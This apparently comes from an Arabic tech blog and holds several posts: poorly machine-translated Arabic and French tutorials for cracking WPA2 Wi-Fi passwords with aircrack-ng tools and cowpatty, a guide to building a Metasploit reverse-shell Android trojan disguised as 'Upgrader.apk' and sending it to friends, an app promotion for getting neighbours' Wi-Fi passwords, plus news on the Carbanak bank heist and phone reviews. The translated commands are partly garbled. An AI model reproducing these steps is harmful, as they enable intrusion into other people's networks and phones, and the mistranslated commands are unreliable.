كيفية اختراق باسورد الويفي بالباك تراك

1 التعليقات
كجزء من سلسلة بلدي على القرصنة واي فاي المقترحة علي احد المواقع الاجنبية والتي اجتهد لانقل لكم ماطاب منها ، وأريد أن تثبت قطعة  ممتازة من قرصنة البرمجيات لتكسير كلمات السر WPA2-PSK.
في هذا البرنامج التعليمي، سوف نستخدم قطعة من البرمجيات التي وضعتها الباحثة في أمن الشبكات اللاسلكية جوشوا رايت ودعا لCowpatty (في كثير من الأحيان بأسلوب منمق كما CoWPAtty). هذا التطبيق يبسط ويسرع القاموس / هجوم ضد الهجين كلمات السر WPA2، لذلك دعونا نصل الى ذلك!



الخطوة 1: العثور على Cowpatty
Cowpatty هي واحدة من مئات القطع من البرامج التي تم تضمينها في جناح بكترك من البرمجيات. لسبب ما، لم يكن وضعها في/pentest/wireless، ولكن بدلا من ذلك تركت في /usr/local/bin، لذلك دعونا التنقل هناك.
  • cd /usr/local/bin
لأن cowpatty هو في /usr/local/bin وينبغي أن يكون هذا الدليل في PATH الخاص بك، يجب أن نكون قادرين على تشغيلها من أي دليل في بكترك.

الخطوة 2: العثور على شاشة Cowpatty المساعدة
للحصول على الاختصار rundown من الخيارات cowpatty، اكتب ببساطة:

cowpatty



بكترك سوف توفر لك مساعدة الشاشة المختصرة. خذ علما بأن cowpatty يتطلب كل ما يلي.
  • قائمة الكلمات
  • ملف حيث تم القاء القبض password hash
  • وSSID لل target AP
الخطوة 3: ضع محول لاسلكي في وضع مراقب
كما هو الحال في تكسير مع ايركراك-نغ، نحن بحاجة إلى وضع محول لاسلكي في وضع الشاشة.
airmon-ng start wlan0

الخطوة 4: بدء ملف التقاط
ونحن بحاجة للبدء في ملف التقاط حيث سيتم تخزين hashed password عندما كنا التقاطه  4-way handshake.
اذا كان السطر في الاعلي غير مفهوم انظر اليه هنا بالغة الانجليزية 
 we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0
هذا وسوف تبدأ تفريغ على AP المحدد (00: 25: 9C: 97: 4F: 48)، على قناة مختارة (-c 9) وحفظ تجزئة في ملف اسمه cowcrack.

خطوة 5: القبض على المصافحة Capture the Handshake
الآن عندما يتصل شخص ما إلى AP، ونحن سوف نلتقط التجزئة وسوف airdump-NG تبين لنا انه تم القاء القبض عليه في الزاوية العليا اليمنى.

خطوة 6: تشغيل Cowpatty
الآن أن لدينا تجزئة كلمة السر، فإننا يمكن استخدامه مع cowpatty وقائمة الكلمات جهدنا لكسر التجزئة.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2

كما ترون في الصورة أعلاه، cowpatty يولد تجزئة من كل كلمة على لوائح الكلمات لدينا مع SSID كبذرة ومقارنتها تجزئة القبض عليه. عندما تتطابق التجزئة، فإنه dsplays كلمة مرور AP.

خطوة 7: جعل التجزئة الخاصة بك
وعلى الرغم من تشغيل cowpatty يمكن أن تكون بسيطة نوعا ما، كما يمكن أن يكون بطيئا جدا. وتجزئتهpassword hash مع SHA1 مع بذرة من SSID. وهذا يعني أن نفس كلمة المرور على معرفات مجموعة الخدمات المختلفة سوف تولد تجزئات مختلفة. هذا يمنعنا من ببساطة باستخدام جدول rainbow ضد كل نقاط وصول. Cowpatty يجب أن تأخذ في قائمة كلمات المرور التي تقدمها وحساب التجزئة مع SSID لكل كلمة. هذا هو وحدة المعالجة المركزية مكثفة جدا وبطيئة.

يدعم Cowpatty الآن باستخدام ملف التشويش المحسوبة مسبقا بدلا من ملف كلمة نص عادي، مما يجعل من تكسير كلمة السر WPA2-PSK 1000X أسرع! هي ملفات computed hash مسبقا المتاحة من كنيسة واي فاي، ويتم إنشاء هذه الملفات computed hash مسبقا باستخدام 172،000 القاموس الملف و1،000 معرفات مجموعة الخدمات الأكثر شعبية. مفيدة مثل هذا هو، إذا SSID الخاص بك ليست في ذلك 1،000، قائمة تجزئة حقا لا تساعدنا.

في هذه الحالة، نحن بحاجة لتوليد التجزئة الخاصة بنا لدينا SSID الهدف. يمكننا أن نفعل هذا باستخدام تطبيق يسمى genpmk. يمكننا توليد ملف تجزئة لدينا ل"darkcode" قائمة الكلمات لSSID "Mandela2" بكتابة:
  • genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2


خطوة 8: استخدام لدينا تجزئة
بعد أن نكون قد ولدت التجزئة لدينا لمعرفات مجموعة الخدمات معينة، يمكننا ثم كسر كلمة السر مع cowpatty بكتابة:

cowpatty -d hashfile -r -s SSID dumpfile
ترقبوا المزيد اللاسلكية دليل التقطيع
نعتذر عن بعض الاخطاء الموجودة في الموضوع ونقترح عليكم الموضوع في شكله الاصلي بالغة الانجليزية علي الرابط التالي : رابط الموضوع الاصلي

How to Hack Wi-Fi: Cracking WPA2-PSK Passwords with Cowpatty

0 التعليقات
Dans le cadre de ma série sur le piratage Wi-Fi, je veux démontrer un autre excellent morceau de piratage de logiciels pour le craquage de mots de passe WPA2-PSK. Dans mon dernier post, nous  craqué WPA2 utilisant aircrack-ng . Dans ce tutoriel, nous allons utiliser un logiciel développé par le chercheur en sécurité sans fil Joshua Wright appelé  Cowpatty  (souvent stylisée que CoWPAtty). Cette application simplifie et accélère le dictionnaire / attaque hybride des mots de passe WPA2, alors allons-y à elle!

Étape 1: Trouver la Cowpatty

Cowpatty est l'une des centaines de morceaux de logiciel qui sont inclus dans la suite BackTrack de logiciels. Pour une raison quelconque, il n'a pas été placé dans la / pentest / sans fil  répertoire, mais a été laissé dans le  répertoire / usr / local / bin répertoire, alors allons-y naviguer.

cd / usr / local / bin
Parce Cowpatty est dans la  usr / local / bin /  répertoire et ce répertoire ne devrait pas être dans votre PATH, nous ne devrions pas être en mesure d'exécuter à partir de ne importe quel répertoire dans BackTrack.

Étape 2: Trouver l'écran Cowpatty Aide

Pour obtenir un bref aperçu des options cowpatty, tapez simplement:
cowpatty
une liste de mots
un fichier où le hash du mot de passe a été capturé
le SSID de l'AP cible

Étape 3: Placez l'adaptateur sans fil en mode moniteur

Tout comme dans  la fissuration avec aircrack-ng , nous devons mettre l'adaptateur sans fil en mode moniteur.

airmon-ng start wlan0

Étape 4: Lancer un fichier de capture

Ensuite, nous devons commencer à un fichier de capture où le mot de passe haché sera enregistrée nous capturons le 4-way handshake.


airodump-ng --bssid 00: 25: 9C: 97: 4F: 48 -c 9 -w cowpatty mon0

Cela va démarrer une décharge sur l'AP sélectionné ( 00: 25: 9C: 97: 4F: 48 ), sur le canal sélectionné ( -c 9 ) et enregistrez le hachage dans un fichier nommé  Cowcrack .

Étape 5: Capture the Poignée de main

Maintenant, quand quelqu'un se connecte à l'AP, nous capturons le hachage et airdump-ng allons nous montrer qu'il a été capturé dans le coin supérieur droit.

Étape 6: Exécutez le Cowpatty

Maintenant que nous avons le hash du mot de passe, nous pouvons l'utiliser avec cowpatty et de notre liste de mots pour casser le hachage.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r -s /root/cowcrack-01.cap Mandela2
Comme vous pouvez le voir dans la capture d'écran ci-dessus, cowpatty génère un hachage de chaque mot sur notre liste de mots avec le SSID comme une graine et en le comparant au hachage capturé. Lorsque les hash correspondent, il dsplays le mot de passe de l'AP.

Étape 7: Faites votre propre Hash

Bien que fonctionnant cowpatty peut être assez simple, il peut aussi être très lent. Le mot de passe est haché avec hachage SHA1 avec une graine du SSID. Cela signifie que le même mot de passe sur différents SSID va générer différents hachages. Cela nous empêche de simplement en utilisant une table arc contre tous les points d'accès. Cowpatty doit prendre la liste de mot de passe que vous fournissez et calculer le hachage avec le SSID pour chaque mot. Ce est beaucoup de temps CPU et lent.
Cowpatty prend désormais en utilisant un fichier pré-calculé hachage plutôt qu'un fichier de texte en texte brut, ce qui rend le craquage du mot de passe WPA2-PSK 1000x plus rapide! Fichiers de hachage calculées pré sont disponibles auprès de l'  Eglise du WiFi , et ces fichiers pré-calculées hachage sont générées en utilisant 172000 fichier de dictionnaire et les 1000 SSID plus populaires. Aussi utile que ce est, si votre SSID est pas dans ce 1000, la liste de hachage vraiment ne nous aide pas.
Dans ce cas, nous devons générer nos propres tables de hachage pour notre SSID cible. Nous pouvons le faire en utilisant une application appelée  Genpmk . Nous pouvons générer notre dossier de hachage pour la «darkcode" liste de mots pour le SSID "Mandela2" en tapant:

genpmk -f -d /pentest/passwords/wordlists/darkc0de.lst hachages -s Mandela2

Étape 8: Utilisation Notre Hash

Une fois que nous avons généré nos hashs des SSID particuliers, nous pouvons alors casser le mot de passe avec cowpatty en tapant:

cowpatty -d -r hashfile dumpfile -s ssid
Restez connectés pour plus Guides de piratage sans fil

طريقة اختراق هواتف الاندرويد عن طريق صناعة تطبيق بالكالي لينيكس

0 التعليقات
مرحبا بكم في هذه المشاركة : هذا هو البرنامج التعليمي شرح كيفية إختراق هواتف الاندرويد مع كالي.
 لا توجد دروس تفسير هذا الاختراق / استغلال، لذلك، أنا قدمت واحدة. (ومع ذلك، قد تعرف بالفعل عن هذا) وهو منقول عن احد المواقع الاجنبية بطريقة خاصة وبتعبير خاص من اعدادي كما انني لم اجربه حتي الان وساضع رابط شرح الطريقة بالغة الام لتفادي الاخطاء كما ارجوا عدم استخدام الاطريقة لاغراض ظارة هذا ان كانت صحيحة 
الخطوة الاولي
فتح معبر او محطة terminal، وصنع تورجان .apk
ثم نكتب الامر التالي مع تغير LHOST بال ip الخاص بنا
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
يمكنك أيضا الإختراق الروبوت على WAN i.e. من خلال استخدام الشبكة الخاص بك ومشاركته مع العامة / IP الخارجي في LHOST واعادة توجيه منفذ 


خطوة 2: فتح محطة أخرى:
تفعيل metasploit console، بكتابة: msfconsole


الخطوة 3: انشاء مستمع:
بعد القيام بالتحميل (الامر سيستغرق وقتا)، نحمل معالج متعدد للاختراق وذلك بكتابة: use exploit/multi/handler


انشاء  reverse payload بكتابة: set payload android/meterpreter/reverse_tcp
لتعيين L نوع المضيف:  set LHOST 192.168.0.4 حتي وان كان الاختراق علي شبكتك


الخطوة 4: استغلال!
في نوع آخر: استغلال لبدء المستمع.
نسخ التطبيق الذي قمت به (Upgrader.apk) من المجلد الاصلي الي هاتفك الاندرويد .



ثم إرساله باستخدام تحميلها على دروببوكس أو أي موقع تقاسم (مثل: www.speedyshare.com).
ثم إرسال رابط الموقع أن أعطى لك إلى أصدقائك واستغلال هواتفهم (فقط على LAN، ولكن إذا كنت تستخدم طريقة WAN ثم يمكنك استخدام استغلال أي مكان على الإنترنت)

السماح للضحية بتثبيت التطبيق Upgrader (كما قد يعتقد أنها تهدف إلى رفع مستوى بعض الميزات على هاتفه)
ومع ذلك، ينبغي تمكين خيار مخصص لتركيب التطبيقات من مصادر غير معروفة (إن لم يكن) من إعدادات الأمان من هاتف الاندرويد للسماح بثبيت التورجان .
وعندما ينقر المفتوح ...
خطوة 5: BOOM!
هنا يأتي موجه meterpreter



وفي الاخير تكون قد اتمت جميع العمليات ومبروك عليك الاختراق

افظل تطبيق لايجاد باسورد الويفي (مجرب وفعال)

0 التعليقات
السلام عليكم 

طريقة ايجاد باسورد الويفي عن طريق تطبيق wifi map 

نتيجة بحث الصور عن ‪wifi map pro — passwords‬‏

في موضوع اليوم سنتطرق واياكم الي تطبيق رائع علي هواتف التي تعمل بنظام الاندرويد و الابس ستورن وهو تطبيق رائع يساعد في فك باسورد الويفي  حتي دون اللجوء الي الاختراق واستعمال كالي او باك تراك او اي نظام مساعد في الاختراق وبطريقة قانونية وهذا يكفي ان تتوفر علي هاتف ذكي من النسخ الحديثة لان التطبيق لا يعمل علي الانظمة القديمة 
لقد جربت التطبيق بنفسي علي واشغل معي وتمكنت من تووفر علي مجموعة من البسواردات الخاصة بسكان الحي الذي اعيش فيه وهو بالفعل يعمل 
وطريقة العمل علي التطبيق هي بان تشغل الويفي في جهازك وتشغل الGPS لتحديد المواقع او يمكنك تشغيل اداة مرور البيانات ثم تدخل الي التطبيق وتظغط علي رمز السهم لتحديد موقعك ومن هناك سيخبرك عن كل نقاط الويفي القريبة منك تظغط عليها لتجد الباسورد مكتوب
  يمكنك تحميل التطبيق من رابط التالي  wifi map

قراصنة التكنولوجيا الفائقة سرقة -300 ملايين دولار من 100 من البنوك

0 التعليقات
في نهاية هذا الاسبوع، نشرت صحيفة نيويورك تايمز تفاصيل حملة جنائية التكنولوجيا الفائقة والتي شهدت البنوك في روسيا، واليابان، وأوروبا والولايات المتحدة تعرضت لهجوم كبير البرمجيات الخبيثة وسرقة الملايين من الدولارات.
القصة، التي انبثقت عن تقرير كاسبرسكي التي كانت مشتركة مع صحيفة قبل نشره رسميا، تلقى طبيعي انتباه الآخرين في وسائل الإعلام:

Media reports

وقال كاسبرسكي كريس دوجيت صحيفة نيويورك تايمز أن الهجوم - الذي تمارسه عصابة ما يسمى ب "Carbanak"  "من المرجح انه الهجوم الأكثر تطورا الذي شهده العالم حتى الآن من حيث التكتيكات والأساليب التي استخدمت من المجرمين الإلكترونيين علي أن تبقى سرية. "
في ديسمبر، وصفت روسيا قرصنة عصابة كيف سرقت الملايين من البنوك، واستهداف أنظمة الدفع الإلكتروني وحتى تركيب البرمجيات الخبيثة على أجهزة الصراف الآلي البنية التحتية لإدارة التي أسفرت عن سرقة من اجهزة الصراف.

العصابة كان اسمها  "Anunak" والتي تم الكشف عنها من قبل باحثين في المجموعة-IB وفوكس-IT، الذي كشف لأول مرة الحملة التي أفيد أيضا عن طريق أمثال فوربس في ذلك الوقت.
كما هو الظن عند بعض الخبراء ان  Anunak وCarbanak واحدة وهي نفس العصابة. تقرير كاسبرسكي ربما يكون قد أمسك انتباه أمثال نيويورك تايمز، ولكن الآن يبدو أن ما هو "جديد" هو فقط أن المزيد من البنوك أصيبت من قبل المتسللين من أكد في وقت سابق، والمزيد من المال سرقت

Anunak story

فمن العار أن صحيفة نيويورك تايمز لا تشير الي أبحاث سابقة قام بها فوكس-IT والمجموعة-IB، وبدلا من ذلك يعطي كل دائرة الضوء للباحثين في كاسبرسكي .

شيء الوحيد المؤكد. البنوك بحاجة للحفاظ على سرعة دهائهم وعلاج الأمن كأولوية عالية، كما أصبح القراصنة أكثر تطورا من أي وقت مضى والجريئة في محاولاتهم لسرقة النقدية.

معاينة فنية للنسخة التجريبية لهاتف LG G Flex 2 الجديد

0 التعليقات
السلام عليكم


أول LG G فليكس إنتاج الأداء ممتاز، بما في ذلك عمر البطارية جيدة جدا، ولكن شاشته تعاني من الكثير من مواطن الخلل. الكورية تطلق الإصدار الثاني من الهاتف الذكي لها منحني، مع عرض-P OLED دائما، ولكن هذه المرة كامل HD. LG ايضا ان تختار للحصول على أحدث جيل من سنابدراجون المعالج من كوالكوم، 810، مع نظام 64 بت قادرا على استخدام كل قدراته. اختبرنا إصدار ما قبل إنتاج الجهاز الذي يعطينا أول اطلالة له على قدراته. اهتمام جميع التدابير المنشورة هنا لا تعبر بالضرورة عن الأداء النهائي للوحدة. وسوف نتأكد من تحديث هذه المقالة عندما اختبرنا G فليكس 2 في الإصدار التجاري.

LG G Flex 2
واقعيته

تصميم الجانب،لا شكايات فيه والكمالية هي مثالية ويقوم الجهاز بعرض جماليات جذابة للغاية، وذلك بفضل انحناء الشاشة لديه مساحة واسعة من الجزء الأمامي من الهاتف الذكي، ويعطيها المزيد من السحر. وحدة التحظير: الغطاء الخلفي من الهاتف الذكي لا يزال من البلاستيك لامع وزلق، وليس لطيف الملمس للغاية .
خصائص "SCRATCHPROOF" تبقى الأدوات تماما، وغير مقنعة حقا، وفقا لبعض التجارب: لم تختفى جميع الخدوش الخفيفة . ولكن تسليط الضوء على G فليكس 2، فهو خفيف جدا للكاميرا في شكل 5.5 بوصة. لذلك هو لطيف جدا، وخصوصا في يد كبيرة.
LG G Flex 2
شاشة جميلة جدا  ليست مشرقة بما فيه الكفاية

نجد متعة تكنولوجيا OLED  ضمن شاشة G فليكس 2. الصورة هي أكثر إقناعا بكثير من الأولى G فليكس
الشركة الكورية: لا توجد مشكلة "الحبوب ظهور نقاط علي الصورة" للصورة (فهي غير مرئية تقريبا لأن التعريف هو أكثر بكثير غرامة)، أو بكسل التفاعل (أي تأخر الحركة حتى في الإضاءة الخافتة)، أو عرض المثابرة. على العكس من ذلك هو على ما يرام، والألوان جميلة، وزوايا مشاهدة واسعة جدا ... فقط سطوع الشاشة غير كاف: فقط 222 شمعة / متر مربع في المتوسط (278 شمعة / متر مربع عن طريق إيقاف اقتصاد الطاقة OLED، وهو غير مستحسن)، في حين أن غالاكسي S5 يتصدر بها في أكثر من 500 شمعة / متر مربع. أما بالنسبة للانحناء، والجميع سوف نقدر ذلك بطريقتها الخاصة، ولكن هناك شيء واحد مؤكد: أنها ليست على الإطلاق محرجة.

قضية وحدة المعالجة المركزية

في تجربته من قبل موقع 01net.com ، فإنهم سرعان ما لاحظو سلوك غريب سنابدراجون المعالج 810 سلاح G فليكس 2. وتشير بعض الشائعات المحموم غير عادي من سنابدراجون 810، ولكن في عملية التحقيق لديهم، الجسم من الجهاز لو يسخن أكثر الآخرين ... والمشكلة تكمن في مكان آخر:  وكانت بعض اختبارات الأداء المبهر ليس كما هو من المتوقع،  يبدو بأن رقاقة اتخذت تدابير جذرية للحفاظ على درجة حرارته مما يوحي إلى مستوى مقبول.

في الواقع، المعالج قبالة بسرعة كبيرة جدا اثنين من النوى الأربعة الأكثر قوة عندما دفعت الي الحد الأقصى. في الممارسة العملية، لا شيء خطير الكاميرا تدور على نحو سلس جدا وسريعة جميع تطبيقات الاندرويد المتاحة حاليا على سوق Play جوجل. ولكن، وفقا لالنتائج التي توصلنا إليها، رقاقة سنابدراجون 810 لا يمكن عقد أكثر من 20 ثانية مع أربع نوى اللحاء A57 محملة بالكامل (دون تجاوز 2 غيغاهرتز).
LG G Flex 2

ولا ننسي ،الألعاب 3D، وقوية رقاقة الرسومات 430  كوالكوم يقدم أداء مخيبا للآمال، وخاصة أن لديها لإدارة HD المعيار الكامل: لا يزيد عن 50 لقطة في الثانية في ملحمة قلعة (و 46 إطارا في الثانية بعد 20 دقيقة من الاختبار، وذلك دون تباطؤ واضح). الهواتف الذكية الأخرى مع شاشة HD الكاملة وسنابدراجون المعالج 801 (الخلفي 330) تتجاوز 55 إطارا في الثانية في نفس الاختبار.

الحكم الذاتي ضعيف

لكن خيبة أمل كبيرة للG فليكس 2 (لم تستكمل، لا بد من التذكير) يتعلق الحكم الذاتي. قمنا بقياس درجة الأولى أكثر من 21 ساعة محادثة صوتية، وهي ليست سيئة. ولكن عندما تكون الشاشة على وحدة في العملية، نلاحظ انهيار في القدرة على التحمل، وبالكاد 5h19min اختبار لدينا تنوعا (بدلا تطالب مع المعالج)، و6 ساعات فقط  تصفح الإنترنت (المتساهلة مع المعالج) وليس أكثر من 11 ساعات من تشغيل الفيديو.

اداء الصورة G3 

لا توجد مفاجئة، وG فليكس 2 يتضمن نفس الجهاز للصورة كما في G3 ، لذلك يلتقط نفس جودة الصورة. عموما،هو ممتاز، حتى أكثر تفصيلا من اي فون 6 + وغالاكسي نوت 4. توازن اللون الأبيض هو في كثير من الأحيان فقط، HDR معقول وسريع وناجح. في ضوء منخفض، وG فليكس 2 من بين الأفضل، مثل G3، ولكن لا يزال الشق تحت غالاكسي نوت 4 و+ iPhone 6 . في الفيديو، انها مائعة جدا ومفصلة، وخاصة في 4K، ولكن التركيز في بعض الأحيان بطيئ جدا. سيئ للغاية، أن جهاز الاستشعار الأمامي يوفر قرار من 2.1 ميغا بكسل.

LG G Flex 2
HDR غير معقول في الألوان، وفعال جدا.

LG G Flex 2

كذلك لاحظ الفرق بين full HD و ultra HD
LG G Flex 2

حكم الفريق التقني حول الهاتف

G فليكس 2 جعل انطباعا جيدا: تصميمه ناجح، فإنه هو خفيف جدا لحجمه، وأداء صورته ممتاز. لكن شاشته بخيبة أمل بسبب افتقارها للسطوع، والأداء ليس ذلك الذي كنا نتوقعه لهاتف ذكي من هذا العيار، مثل الحكم الذاتي، غير كافية. كما هو عليه، فإننا نعزو النتيجة 2 النجوم فقط. ولكن هل هناك نموذج ما قبل الإنتاج، والتي ما زالت تفتقر إلى العديد من التحسينات. سوف نقوم بتحديث الاختبار مع القياسات المأخوذة على النسخة النهائية من G فليكس 2.

ملاحظة : الهاتف مازال لم يعرض للبيع وهذه المعاينة تختص بالنسخة التجريبة وقد يطور في النسخة التجارية

معاينة حصرية لهاتف JOLLA JP-1301

0 التعليقات
الاندرويد و ios  لديهما منافس واحد فقط  حقيقي في سوق الهواتف الذكية: ويندوز فون الذي يملك ما يقرب من 10٪ من السوق.
الشركة الفنلندية جولا تحاول بديل جديد مع سيلفش، ونحن قد نقترب بالفعل MWC الماضي في برشلونة. واحد الذي هو اختبار الحياة اليومية؟

اسمحوا أن يقال في آن واحد، والهواتف الذكية جولا JP 1301 هو في الغالب معرضا لاظهار كيف يتصرف المسؤول نظام سيلفش. الجهاز للبيع، ولكن النظام الأساسي هو نظام الأجهزة قديمة بعض الشيء، وكانت خصوصا الكاميرا، حتى ذلك الحين، وهو منتج مستوى الدخول. التشطيبات به صحيحة، والتصميم أصلي للغاية، ولكن على وجه التيار الهواتف الذكية بسعر مماثل (250 €) 

Jolla


نظام مشجع للغاية

لدينا انطباعات جيدة جدا: واجهة السوائل نوعا ما، والاستجابة، وعلى الرغم من انخفاض الطاقة للجهاز. بيئة العمل، تقوم أساسا على الضوابط إيمائية، والخلط في البداية، ولكن في الواقع العملي جدا وفعالة. تعدد المهام هو أيضا عملي جدا، حتى لو كانت الكاميرا بطيئة لتحميل التطبيقات.
وجانب التصميم، بل هو بالأحرى ناجح: كل شيء نظيف جدا، ولكن من السهل أن نفهم، ولوحة المفاتيح الافتراضية هو لطيف ومريح للاستخدام. باختصار، نعم، تم تصميم سيلفش جيدا.
متوافق مع الاندرويد

الشركة المصنعة الفنلندية تضمن نظامه سيلفش يدعم تطبيقات الاندرويد. ومخازن التطبيق بديلة للعب متوفرة وتطبيقات تركيب (APK) يتم تماما كما على الاندرويد. معظم التطبيقات التي تم تحميلها يعملون بشكل جيد، على الرغم من عدم وجود القليل من السيولة، ويرجع ذلك أساسا إلى انخفاض القوة في الهاتف الذكي. الفيسبوك ورسائله وظيفية بالكامل، تويتر جدا، خرائط جوجل أو جوجل كروم. حتى يعمل اختبار Antutu، وبعض الألعاب 3D مثل أسطورة ماستر. وبالمثل، فإن نظام يدمج بشكل جيد، مسقط رأسه، وحسابات جوجل، الفيسبوك أو تويتر، وقال انه يجمع كل الرسائل والإشعارات في واجهة موحدة.

Jolla


بعض المشاكل

ككل الهواتف ليس مثالي.ويبدو ان الجهاز ليكون متوافق مع تنسيق الفيديو الذي يستخدمه المحمول يوتيوب ويوتيوب طلب لمصنع الاندرويد. مستعرض ويب جزءا لا يتجزأ من النظام الفقير: بطيء ومريح، فإنه لا يقرأ بشكل صحيح أشرطة الفيديو ديلي موشن. لحسن الحظ، والكروم للاندرويد يعمل بشكل صحيح. ظلت OS سيلفش مستقرة جدا في تجاربه، لكنه زرع ماك بوك برو (غير متوافق مع نظام التشغيل Mac OS X). المتجر تطبيق جولا لا يزال رقيق جدا، وعموما كان النظام غير مجهز بما يكفي أن نذكر الاندرويد درجة عالية من الفنية، ios وغيرها من هاتف ويندوز.

أقل قوة صغيرة صعبة، صور المتوسطة

يحتوي على معالج القديم (ثنائي القلب أنف العجل 400، يسجل 18357 نقطة Antutu الاختبار)، وعرض سطوع محدود (391 شمعة / متر مربع). الحكم الذاتي الجانب، شيء رائع على الرغم من أنه في المتوسط من أرخص الأجهزة في السوق (100 إلى 150 يورو): أقل من 17 ساعة من وقت التحدث، وأقل من 6 ساعات من تشغيل الفيديو، بالكاد خمس ساعات في موقعنا الجديد اختبار ذو فائدة عظيمة. في الصورة، وكاميرا قديمة بعض الشيء نظرا لدخوله الحالي.

Jolla


الحكم


هذا الهاتف الذكي جولا لديه الجدارة لإظهار قدرات نظام OS سيلفش  الجميل، واجهة السوائل بما فيه الكفاية لمثل هذا الجهاز الصغير،قوي مع بيئة العمل الجيدة والقدرة المشجعة. لذلك هو لطيف للاستخدام ولكن يبقى له المعوقات الخطيرة؛ نقاط الضعف الكلاسيكية ل "نظام بروتو" مراقبة قليلة جدا من قبل المطورين. حتى الآن، وأنه ليس من الممكن حقا لتقديم المشورة بشأن الشراء، خاصة بالنسبة للسعر الحالي من € 250، مرتفعة للغاية.

جميع الحقوق محفوظة ©2012-2013 | ، نقل بدون تصريح ممنوع . Privacy-Policy| أنضم ألى فريق التدوين

traget='_blank'>